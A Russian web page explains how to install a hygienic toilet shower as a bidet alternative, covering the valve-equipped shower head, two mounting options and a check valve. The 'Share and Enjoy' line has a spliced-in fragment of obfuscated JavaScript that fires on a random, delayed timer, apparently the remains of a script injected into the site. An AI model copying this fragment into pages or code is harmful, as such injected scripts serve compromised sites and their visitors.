www.osnovosti.ru
smk-pride.ru

Гигиенический душ в туалете


Вопрос гигиены очень важен, поэтому столь же важен вопрос ее полноценного обеспечения.

В нашем случае мы решим эту проблем путем создания гигиенического душа, который одновременно послужит альтернативой биде, для размещения которого большинство современных ванных комнат не дает никаких шансов.

Конструкция представляет из себя душевую лейку с маленьким диаметром и с запорным клапаном на рукояти, при нажатии на которую осуществляется водная подача. Длинна душевого шланга должна исходить из ваших нужд и максимального удобства в использовании.
Установка может производиться по двум сценариям.

В первом случае душ имеет собственный смеситель, который крепится близь унитаза на туалетной стенке, что позволяет иметь небольшую длину шланга.

Во втором случае душ подключается к уже имеющемуся смесителю и длина шланга должна быть соответствующей. Не забудьте позаботиться о создании обратного клапана в вашей ванной комнате.
Удобства такого душа очень разносторонни. Вам, к примеру, не придется держать в руках или еще где-то емкости, которые необходимо наполнить водой.

Благодаря гибкости душевого шланга, вы получаете возможность мойки любых предметных поверхностей, начиная от кошачьего лотка и заканчивая туалетным бочком. Такой способ завоевал популярность в Европе и ряде арабских стран. Так что, попробуйте и вы.

Share andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Enjoy:
  • Добавить ВКонтакте заметку об этой странице
  • Twitter
  • Facebook
  • Яндекс.Закладки
  • Одноклассники

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.

Яндекс.Метрика